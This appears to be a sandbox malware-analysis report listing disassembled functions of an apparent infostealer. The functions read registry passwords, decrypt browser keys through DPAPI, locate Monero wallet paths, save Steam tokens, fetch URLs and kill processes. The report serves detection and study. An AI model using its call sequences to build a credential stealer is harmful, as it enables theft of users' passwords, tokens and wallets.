                                • Source File: 00000000.00000002.2238610735.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4d0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$lstrcpy$AttributesFile
                                • String ID:
                                • API String ID: 3428472996-0
                                • Opcode ID: f0735aae27a34d4ce20db0990ddb28cb2df02cbb94572d21ced9c1a4025bba98
                                • Instruction ID: 0ebfc895a496ee303e7724ba2ae83a2e426e351f8eeec1ef3781eb15360520a5
                                • Opcode Fuzzy Hash: f0735aae27a34d4ce20db0990ddb28cb2df02cbb94572d21ced9c1a4025bba98
                                • Instruction Fuzzy Hash: 24419F71A10128DBCB21EB65DD54ADE73B4BF58300F008AAAF64993351DF789F858B94
                                APIs
                                  • Part of subcall function 004D77D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 004D7805
                                  • Part of subcall function 004D77D0: RegEnumValueA.ADVAPI32(80000001,00000000,?,?,00000000,?,?,?,?,00000000,00020019,?), ref: 004D784A
                                  • Part of subcall function 004D77D0: StrStrA.SHLWAPI(?,Password), ref: 004D78B8
                                  • Part of subcall function 004D77D0: GetProcessHeap.KERNEL32(00000000,00000000), ref: 004D78EC
                                  • Part of subcall function 004D77D0: HeapFree.KERNEL32(00000000), ref: 004D78F3
                                • lstrcat.KERNEL32(00000000,00504AD4), ref: 004D7A90
                                • lstrcat.KERNEL32(00000000,?), ref: 004D7ABD
                                • lstrcat.KERNEL32(00000000, : ), ref: 004D7ACF
                                • lstrcat.KERNEL32(00000000,?), ref: 004D7AF0
                                • wsprintfA.USER32 ref: 004D7B10
                                • lstrcpy.KERNEL32(00000000,?), ref: 004D7B39
                                • lstrcat.KERNEL32(00000000,00000000), ref: 004D7B47
                                • lstrcat.KERNEL32(00000000,00504AD4), ref: 004D7B60
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2238610735.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4d0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$Heap$EnumFreeOpenProcessValuelstrcpywsprintf
                                • String ID: :
                                • API String ID: 398153587-3653984579
                                • Opcode ID: f7eadd3bca798fcbfc746be04278cdcb3934454414f4e2451160f2227216d149
                                • Instruction ID: 5b2405236e768c9b13419d07f2489aceb105df03c7ee3e5c6c4d4be40c162058
                                • Opcode Fuzzy Hash: f7eadd3bca798fcbfc746be04278cdcb3934454414f4e2451160f2227216d149
                                • Instruction Fuzzy Hash: 7131B672A04214EFCB10DB68DC549AFB779FB88704B14861BE64693350EF78E941CB69
                                APIs
                                • lstrlen.KERNEL32(00000000), ref: 004E820C
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004E8243
                                • lstrlen.KERNEL32(00000000), ref: 004E8260
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004E8297
                                • lstrlen.KERNEL32(00000000), ref: 004E82B4
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004E82EB
                                • lstrlen.KERNEL32(00000000), ref: 004E8308
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004E8337
                                • lstrlen.KERNEL32(00000000), ref: 004E8351
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004E8380
                                Memory Dump Source
                                • Source File: 00000000.00000002.2238610735.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4d0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpylstrlen
                                • String ID:
                                • API String ID: 2001356338-0
                                • Opcode ID: 35af2675fe6555894956e989cd2014caec37486b077753fa0b5c7a543492abef
                                • Instruction ID: c4248c751fa2a58232fb80be67524c3d682703935f8e6b63f08d28b9fdcbd0fb
                                • Opcode Fuzzy Hash: 35af2675fe6555894956e989cd2014caec37486b077753fa0b5c7a543492abef
                                • Instruction Fuzzy Hash: 59518D71A006129BDB10DF3AD968A6BB7A8EF44701F10855AED0ADB345DF38ED50CBE4
                                APIs
                                • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 004D7805
                                • RegEnumValueA.ADVAPI32(80000001,00000000,?,?,00000000,?,?,?,?,00000000,00020019,?), ref: 004D784A
                                • StrStrA.SHLWAPI(?,Password), ref: 004D78B8
                                  • Part of subcall function 004D7750: GetProcessHeap.KERNEL32(00000008,00000400), ref: 004D775E
                                  • Part of subcall function 004D7750: RtlAllocateHeap.NTDLL(00000000), ref: 004D7765
                                  • Part of subcall function 004D7750: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 004D778D
                                  • Part of subcall function 004D7750: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000400,00000000,00000000), ref: 004D77AD
                                  • Part of subcall function 004D7750: LocalFree.KERNEL32(?), ref: 004D77B7
                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 004D78EC
                                • HeapFree.KERNEL32(00000000), ref: 004D78F3
                                • RegEnumValueA.ADVAPI32(80000001,00000000,?,000000FF,00000000,00000003,?,?,80000001), ref: 004D7A35
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2238610735.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4d0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$EnumFreeProcessValue$AllocateByteCharCryptDataLocalMultiOpenUnprotectWide
                                • String ID: Password
                                • API String ID: 356768136-3434357891
                                • Opcode ID: 1fe780a6df0bb59a3be61e61323ebeb5765b2ec6f42ccfccecc3ebb28e930de6
                                • Instruction ID: c67af6786e22a33e789445ddba886aaff1e94dcabdd66149eb3ec0d75185d858
                                • Opcode Fuzzy Hash: 1fe780a6df0bb59a3be61e61323ebeb5765b2ec6f42ccfccecc3ebb28e930de6
                                • Instruction Fuzzy Hash: AA7130B1D0021DEBDB10DF95DC90AEEBBB9EF45300F1045AAE609A7340EB355A85CF95
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104), ref: 004D1135
                                • RtlAllocateHeap.NTDLL(00000000), ref: 004D113C
                                • RegOpenKeyExA.ADVAPI32(80000001,SOFTWARE\monero-project\monero-core,00000000,00020119,?), ref: 004D1159
                                • RegQueryValueExA.ADVAPI32(?,wallet_path,00000000,00000000,00000000,000000FF), ref: 004D1173
                                • RegCloseKey.ADVAPI32(?), ref: 004D117D
                                Strings
                                • SOFTWARE\monero-project\monero-core, xrefs: 004D114F
                                • wallet_path, xrefs: 004D116D
                                Memory Dump Source
                                • Source File: 00000000.00000002.2238610735.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                Similarity
                                • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                • String ID: SOFTWARE\monero-project\monero-core$wallet_path
                                • API String ID: 3225020163-4244082812
                                • Opcode ID: 0527611a8352b628f13c18d3c1d8be36831e54b18d10eff272b06073009c8771
                                • Instruction ID: 54098e28197c9d00ca8201c178ad6b19f824ffb8b0fe7d57f76177d150144f7a
                                • Opcode Fuzzy Hash: 0527611a8352b628f13c18d3c1d8be36831e54b18d10eff272b06073009c8771
                                • Instruction Fuzzy Hash: 31F01D75640309FBD7109BA09C4DFAF7B6CEB04715F108255BF05E2291EAB45A4487A5
                                APIs
                                • memcmp.MSVCRT(?,v20,00000003), ref: 004D9E04
                                • memcmp.MSVCRT(?,v10,00000003), ref: 004D9E42
                                • LocalAlloc.KERNEL32(00000040), ref: 004D9EA7
                                  • Part of subcall function 004F71E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 004F71FE
                                • lstrcpy.KERNEL32(00000000,00504C48), ref: 004D9FB2
                                Memory Dump Source
                                • Source File: 00000000.00000002.2238610735.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                Similarity
                                • API ID: lstrcpymemcmp$AllocLocal
                                • String ID: @$v10$v20
                                • API String ID: 102826412-278772428
                                • Opcode ID: a09436605d7807a14aaa5584ae8d1509452f83c0857af8d7281870688c1ac0de
                                • Instruction ID: 092af5f4c4863307e6f697e82423c61ded7a1aee8a7a6c40f4b29250cce34cd0
                                • Opcode Fuzzy Hash: a09436605d7807a14aaa5584ae8d1509452f83c0857af8d7281870688c1ac0de
                                • Instruction Fuzzy Hash: 8151DF71A002199BDB10EF65DC91B9E77A4EF50318F15406BFA09EB351CBB8ED008B98
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 004D565A
                                • RtlAllocateHeap.NTDLL(00000000), ref: 004D5661
                                • InternetOpenA.WININET(004FCFEC,00000000,00000000,00000000,00000000), ref: 004D5677
                                • InternetOpenUrlA.WININET(00000000,00000001,00000000,00000000,04000100,00000000), ref: 004D5692
                                • InternetReadFile.WININET(?,?,00000400,00000001), ref: 004D56BC
                                • memcpy.MSVCRT(00000000,?,00000001), ref: 004D56E1
                                • InternetCloseHandle.WININET(?), ref: 004D56FA
                                • InternetCloseHandle.WININET(00000000), ref: 004D5701
                                Memory Dump Source
                                • Source File: 00000000.00000002.2238610735.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                Similarity
                                • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessReadmemcpy
                                • String ID:
                                • API String ID: 1008454911-0
                                • Opcode ID: 2de6188a7cce792df95487c807adc0095613e5cdfb0ba5df38dffab3115b2e6a
                                • Instruction ID: 0541994642dc728c7e780659202754fe1f12959ea5130d1f11b2b0e20591b0bd
                                • Opcode Fuzzy Hash: 2de6188a7cce792df95487c807adc0095613e5cdfb0ba5df38dffab3115b2e6a
                                • Instruction Fuzzy Hash: 8841A170A00205DFDB14CF54DD94BAAB7B4FF44300F24C16BE6189B3A1EB799841CB98
                                APIs
                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000,?), ref: 004F4759
                                • Process32First.KERNEL32(00000000,00000128), ref: 004F4769
                                • Process32Next.KERNEL32(00000000,00000128), ref: 004F477B
                                • OpenProcess.KERNEL32(00000001,00000000,?), ref: 004F479C
                                • TerminateProcess.KERNEL32(00000000,00000000), ref: 004F47AB
                                • CloseHandle.KERNEL32(00000000), ref: 004F47B2
                                • Process32Next.KERNEL32(00000000,00000128), ref: 004F47C0
                                • CloseHandle.KERNEL32(00000000), ref: 004F47CB
                                Memory Dump Source
                                • Source File: 00000000.00000002.2238610735.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                Similarity
                                • API ID: Process32$CloseHandleNextProcess$CreateFirstOpenSnapshotTerminateToolhelp32
                                • String ID:
                                • API String ID: 3836391474-0
                                • Opcode ID: ffaf4a6120589d01dfabe2ad4c04af2ac0fba03f339532e6bb24393c60c9544a
                                • Instruction ID: 36b0f1d14b1b69456b66e69eb6cabefa24fc62fa9d023b1ee43038cf37ed96d3
                                • Opcode Fuzzy Hash: ffaf4a6120589d01dfabe2ad4c04af2ac0fba03f339532e6bb24393c60c9544a
                                • Instruction Fuzzy Hash: 2D019271601219EBE7206B709C89FFB77BCEB48751F048291FB4591181EF789D908A69
                                APIs
                                • lstrlen.KERNEL32(00000000), ref: 004E8435
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004E846C
                                • lstrlen.KERNEL32(00000000), ref: 004E84B2
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004E84E9
                                • lstrlen.KERNEL32(00000000), ref: 004E84FF
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004E852E
                                • StrCmpCA.SHLWAPI(00000000,00504C3C), ref: 004E853E
                                Memory Dump Source
                                • Source File: 00000000.00000002.2238610735.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                Similarity
                                • API ID: lstrcpylstrlen
                                • String ID:
                                • API String ID: 2001356338-0
                                • Opcode ID: c4dbe9568eae01d18bec728b26033410778dce8defd58107eaaa6d7835ab92e3
                                • Instruction ID: 4715e4050150a2cad269be82de406155c17cfe00f555265a4eba4f4a02c37c33
                                • Opcode Fuzzy Hash: c4dbe9568eae01d18bec728b26033410778dce8defd58107eaaa6d7835ab92e3
                                • Instruction Fuzzy Hash: 5551CF716002069FCB20DF6AD994A5BB7F4EF48301F14895EEC89DB345EF38E9418B54
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 004F2925
                                • RtlAllocateHeap.NTDLL(00000000), ref: 004F292C
                                • RegOpenKeyExA.ADVAPI32(80000002,00CEBA98,00000000,00020119,004F28A9), ref: 004F294B
                                • RegQueryValueExA.ADVAPI32(004F28A9,CurrentBuildNumber,00000000,00000000,00000000,000000FF), ref: 004F2965
                                • RegCloseKey.ADVAPI32(004F28A9), ref: 004F296F
                                Memory Dump Source
                                • Source File: 00000000.00000002.2238610735.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                Similarity
                                • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                • String ID: CurrentBuildNumber
                                • API String ID: 3225020163-1022791448
                                • Opcode ID: 58e64b7c1b7ce8e2f9f41e90bb671c8736ea0b70e2b4ee13afb563f09bd3f0bd
                                • Instruction ID: d67ed915d23cef1965ae0f1345c9fbed7c8c15e456040747bf152f85308594b5
                                • Opcode Fuzzy Hash: 58e64b7c1b7ce8e2f9f41e90bb671c8736ea0b70e2b4ee13afb563f09bd3f0bd
                                • Instruction Fuzzy Hash: 0C01F1B4600319EBD310CBA09C58EFB7BACEB08701F108158FF8497281EAB459048794
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 004F2895
                                • RtlAllocateHeap.NTDLL(00000000), ref: 004F289C
                                  • Part of subcall function 004F2910: GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 004F2925
                                  • Part of subcall function 004F2910: RtlAllocateHeap.NTDLL(00000000), ref: 004F292C
                                  • Part of subcall function 004F2910: RegOpenKeyExA.ADVAPI32(80000002,00CEBA98,00000000,00020119,004F28A9), ref: 004F294B
                                  • Part of subcall function 004F2910: RegQueryValueExA.ADVAPI32(004F28A9,CurrentBuildNumber,00000000,00000000,00000000,000000FF), ref: 004F2965
                                  • Part of subcall function 004F2910: RegCloseKey.ADVAPI32(004F28A9), ref: 004F296F
                                • RegOpenKeyExA.ADVAPI32(80000002,00CEBA98,00000000,00020119,004E9500), ref: 004F28D1
                                • RegQueryValueExA.ADVAPI32(004E9500,00CFF5A0,00000000,00000000,00000000,000000FF), ref: 004F28EC
                                • RegCloseKey.ADVAPI32(004E9500), ref: 004F28F6
                                Memory Dump Source
                                • Source File: 00000000.00000002.2238610735.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                Similarity
                                • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                • String ID: Windows 11
                                • API String ID: 3225020163-2517555085
                                • Opcode ID: fc0e672230ecf564a1b52adca10001acdc9788447c34c06b944f272390ac0f26
                                • Instruction ID: b4a9f1367af96ff26974190d6cb80c6e5b286c62de8f8afd763ffd003591c579
                                • Opcode Fuzzy Hash: fc0e672230ecf564a1b52adca10001acdc9788447c34c06b944f272390ac0f26
                                • Instruction Fuzzy Hash: FB01DFB0600209FBD710ABA4AD49EBB776CEB44301F008259FF08D2290EEB8590087A5
                                APIs
                                • LoadLibraryA.KERNEL32(?), ref: 004D723E
                                • GetProcessHeap.KERNEL32(00000008,00000010), ref: 004D7279
                                • RtlAllocateHeap.NTDLL(00000000), ref: 004D7280
                                • GetProcessHeap.KERNEL32(00000000,?), ref: 004D72C3
                                • HeapFree.KERNEL32(00000000), ref: 004D72CA
                                • GetProcAddress.KERNEL32(00000000,?), ref: 004D7329
                                Memory Dump Source
                                • Source File: 00000000.00000002.2238610735.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                Yara matches
                                Similarity
                                • API ID: Heap$Process$AddressAllocateFreeLibraryLoadProc
                                • String ID:
                                • API String ID: 174687898-0
                                • Opcode ID: 667f31ec325d794fea49c29ef13f72668ebe1d2f3c3da75e3c0062b3023b6da0
                                • Instruction ID: 7e7cb933e66bb28ffb3c463869bc32df6b9d023dbd5152056cf5a2e88e691653
                                • Opcode Fuzzy Hash: 667f31ec325d794fea49c29ef13f72668ebe1d2f3c3da75e3c0062b3023b6da0
                                • Instruction Fuzzy Hash: 69416971B05606DBDB20CFA9DC94BAAB3E8EB88305F1445ABED49C7350F639E900DB54
                                APIs
                                • lstrcpy.KERNEL32(00000000), ref: 004D9CA8
                                • LocalAlloc.KERNEL32(00000040,?), ref: 004D9CDA
                                • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 004D9D03
                                Strings
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4d0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: AllocLocallstrcpy
                                • String ID: $"encrypted_key":"$DPAPI
                                • API String ID: 2746078483-738592651
                                • Opcode ID: 2346949ffa77885765a3e9e91a1a2b881747d85de018f3e5ac1f45f7af191f57
                                • Instruction ID: 868afdb2bd99658114cafa0ad9ce5ef3339af25d68f102b4e97e150b602696a3
                                • Opcode Fuzzy Hash: 2346949ffa77885765a3e9e91a1a2b881747d85de018f3e5ac1f45f7af191f57
                                • Instruction Fuzzy Hash: C641EF31A002199BCB21EF65DD616AFB7B5EF54308F04416BE915E7352DA78ED00C788
                                APIs
                                • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 004EEA24
                                • lstrcpy.KERNEL32(00000000,?), ref: 004EEA53
                                • lstrcat.KERNEL32(?,00000000), ref: 004EEA61
                                • lstrcat.KERNEL32(?,00501794), ref: 004EEA7A
                                • lstrcat.KERNEL32(?,00CF9440), ref: 004EEA8D
                                • lstrcat.KERNEL32(?,00501794), ref: 004EEA9F
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4d0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$FolderPathlstrcpy
                                • String ID:
                                • API String ID: 818526691-0
                                • Opcode ID: de989bd2118dff75bdb0416a0e7680eb067dfbaa918f19f16a53c54d2990292f
                                • Instruction ID: 1d65fc97e1e1b7e8e3ff6c34b0c7a253002aa28bb338c815c9aa7fdb5f032643
                                • Opcode Fuzzy Hash: de989bd2118dff75bdb0416a0e7680eb067dfbaa918f19f16a53c54d2990292f
                                • Instruction Fuzzy Hash: EA41D271A10118EBCB50EB65DD52FEE7378FF58300F0045AAFA1A97391DE789E448B98
                                APIs
                                • lstrcpy.KERNEL32(00000000,004FCFEC), ref: 004EECDF
                                • lstrlen.KERNEL32(00000000), ref: 004EECF6
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004EED1D
                                • lstrlen.KERNEL32(00000000), ref: 004EED24
                                • lstrcpy.KERNEL32(00000000,steam_tokens.txt), ref: 004EED52
                                Strings
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4d0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrlen
                                • String ID: steam_tokens.txt
                                • API String ID: 367037083-401951677
                                • Opcode ID: d4fe9f6d4e41484c24224eea8c493d1f7d2d69b647e4eb84b55e3d84549e3d0b
                                • Instruction ID: c9a1f58ff6d374920d8743d4ea3b46ddfdc2a46064c880126d4eee89c2366676
                                • Opcode Fuzzy Hash: d4fe9f6d4e41484c24224eea8c493d1f7d2d69b647e4eb84b55e3d84549e3d0b
                                • Instruction Fuzzy Hash: 5A319C31B1015A9BC721BB7BEE5AA6F7764AF20305F00516BF806CB322DA6CDC058799
                                APIs
                                • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,004D140E), ref: 004D9A9A
                                • GetFileSizeEx.KERNEL32(00000000,?,?,?,?,004D140E), ref: 004D9AB0
                                • LocalAlloc.KERNEL32(00000040,?,?,?,?,004D140E), ref: 004D9AC7
                                • ReadFile.KERNEL32(00000000,00000000,?,004D140E,00000000,?,?,?,004D140E), ref: 004D9AE0
                                • LocalFree.KERNEL32(?,?,?,?,004D140E), ref: 004D9B00
                                • CloseHandle.KERNEL32(00000000,?,?,?,004D140E), ref: 004D9B07
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4d0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                                • String ID:
                                • API String ID: 2311089104-0
                                • Opcode ID: d0e3df8d473c4c9aaba15e6993cea221f4405f4c9aa29faffb0b40e576ae671d
                                • Instruction ID: 22e1b7ecfc4c0a944c9fb7969fb5689cabde9c9df6811f4af520cfe59d1cd9c7
                                • Opcode Fuzzy Hash: d0e3df8d473c4c9aaba15e6993cea221f4405f4c9aa29faffb0b40e576ae671d
                                • Instruction Fuzzy Hash: 10113A7160020AEFE710DFA9DC99AAB736CEB05340F10425BF915D6380EB78AD00CBA9
                                APIs
                                • std::_Xinvalid_argument.LIBCPMT ref: 004F5B14
                                  • Part of subcall function 004FA173: std::exception::exception.LIBCMT ref: 004FA188
                                  • Part of subcall function 004FA173: std::exception::exception.LIBCMT ref: 004FA1AE
                                • memmove.MSVCRT(00000000,00000000,?,00000000,00000000,00000000), ref: 004F5B7C
                                • memmove.MSVCRT(00000000,?,?), ref: 004F5B89
                                • memmove.MSVCRT(00000000,?,?), ref: 004F5B98
                                Strings
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4d0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: memmove$std::exception::exception$Xinvalid_argumentstd::_
                                • String ID: vector<T> too long
                                • API String ID: 2052693487-3788999226
                                • Opcode ID: adab836d76edac1253be9db34d41a62021e8e499557ee36ef133477fded7b5dd
                                • Instruction ID: a1c66d7bb97d879abbc9b4f725cea548fb9c66f05f2a72b949339b8fd1e91bc9
                                • Opcode Fuzzy Hash: adab836d76edac1253be9db34d41a62021e8e499557ee36ef133477fded7b5dd
                                • Instruction Fuzzy Hash: 0F418171B005199FCF18DF68C995ABEBBB5EB89310F15822AEA09E7344D6349D008B94
                                APIs
                                • std::_Xinvalid_argument.LIBCPMT ref: 004E7D58
                                  • Part of subcall function 004FA1C0: std::exception::exception.LIBCMT ref: 004FA1D5
                                  • Part of subcall function 004FA1C0: std::exception::exception.LIBCMT ref: 004FA1FB
                                • std::_Xinvalid_argument.LIBCPMT ref: 004E7D76
                                • std::_Xinvalid_argument.LIBCPMT ref: 004E7D91
                                Strings
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4d0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Xinvalid_argumentstd::_$std::exception::exception
                                • String ID: invalid string position$string too long
                                • API String ID: 3310641104-4289949731
                                • Opcode ID: 10461f46034b6d62815850247b13e2094b93bd1c161723aed091883be47d6fd3
                                • Instruction ID: 4edb9098ae554449c21ae9181ccc76283f0ded4595fb19e908646b9411e587d5
                                • Opcode Fuzzy Hash: 10461f46034b6d62815850247b13e2094b93bd1c161723aed091883be47d6fd3
                                • Instruction Fuzzy Hash: 1221D2323042448BD720DE6DDD80E3AB7E5EF92761B204A6FE5468B381D774D80087A9
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104), ref: 004F33EF
                                • RtlAllocateHeap.NTDLL(00000000), ref: 004F33F6
                                • GlobalMemoryStatusEx.KERNEL32 ref: 004F3411
                                • wsprintfA.USER32 ref: 004F3437
                                Strings
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4d0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateGlobalMemoryProcessStatuswsprintf
                                • String ID: %d MB
                                • API String ID: 2922868504-2651807785
                                • Opcode ID: e638ce93b675e3f4002abfd2735201be6a892d382c637a26a11fcded29db8407
                                • Instruction ID: dbbd32cf7424f16b9b45882fda4f88c0a7c6e8e4d5505f785d428af0a926f482
                                • Opcode Fuzzy Hash: e638ce93b675e3f4002abfd2735201be6a892d382c637a26a11fcded29db8407
                                • Instruction Fuzzy Hash: 8401B971A04218ABDB04DF98DC49B7EB778FB44711F004229FA05E7380DB7859008699
                                APIs
                                • RegOpenKeyExA.ADVAPI32(80000001,00CFE6A0,00000000,00020119,?), ref: 004ED7F5
                                • RegQueryValueExA.ADVAPI32(?,00CFF6D8,00000000,00000000,00000000,000000FF), ref: 004ED819
                                • RegCloseKey.ADVAPI32(?), ref: 004ED823
                                • lstrcat.KERNEL32(?,00000000), ref: 004ED848
                                • lstrcat.KERNEL32(?,00CFF6F0), ref: 004ED85C
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4d0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$CloseOpenQueryValue
                                • String ID:
                                • API String ID: 690832082-0
                                • Opcode ID: 7cf95f73fb625111c4d3c0c4a84660d8756d2ea0744f8d4d00436f39a83cebc2
                                • Instruction ID: b3564f948076c032b7b391e7a95a164c1b5398304fda7b898a50f774f7cd9513
                                • Opcode Fuzzy Hash: 7cf95f73fb625111c4d3c0c4a84660d8756d2ea0744f8d4d00436f39a83cebc2
                                • Instruction Fuzzy Hash: 4141D370A1020CEBCB54EF65EC92BDE7374AF54308F40816AB90993351EE38AA45CF99
                                APIs
                                • lstrlen.KERNEL32(00000000), ref: 004E7F31
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004E7F60
                                • StrCmpCA.SHLWAPI(00000000,00504C3C), ref: 004E7FA5
                                • StrCmpCA.SHLWAPI(00000000,00504C3C), ref: 004E7FD3
                                • StrCmpCA.SHLWAPI(00000000,00504C3C), ref: 004E8007
                                Memory Dump Source
                                • Source File: 00000000.00000002.2238610735.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                • Associated: 00000000.00000002.2238593413.00000000004D0000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238610735.0000000000507000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238610735.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238610735.0000000000566000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238610735.000000000057F000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238610735.0000000000708000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238803532.000000000071A000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238819672.000000000071C000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238819672.00000000008B1000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238819672.0000000000989000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238819672.00000000009B2000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238819672.00000000009BA000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238819672.00000000009C8000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2239137418.00000000009C9000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2239268030.0000000000B6B000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2239286916.0000000000B6C000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4d0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpylstrlen
                                • String ID:
                                • API String ID: 2001356338-0
                                • Opcode ID: 62268080752ffeed06fd2cc50e80e42094432ea4e4af8053e41d662867916609
                                • Instruction ID: 81c458c474e0df888bb55caa1b9e9ca737cf22cd58a6e5e279ea42c3465409d0
                                • Opcode Fuzzy Hash: 62268080752ffeed06fd2cc50e80e42094432ea4e4af8053e41d662867916609
                                • Instruction Fuzzy Hash: DB41027060410ADFCB20DF69C480EAEB7B4FF18311F11458AE805DB351DB78EA62CB96
                                APIs
                                • lstrlen.KERNEL32(00000000), ref: 004E80BB
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004E80EA
                                • StrCmpCA.SHLWAPI(00000000,00504C3C), ref: 004E8102
                                • lstrlen.KERNEL32(00000000), ref: 004E8140
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004E816F
                                Memory Dump Source
                                • Source File: 00000000.00000002.2238610735.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                • Associated: 00000000.00000002.2238593413.00000000004D0000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238610735.0000000000507000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238610735.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238610735.0000000000566000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238610735.000000000057F000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238610735.0000000000708000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238803532.000000000071A000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238819672.000000000071C000.00000040.00000001.01000000.00000003.sdmp
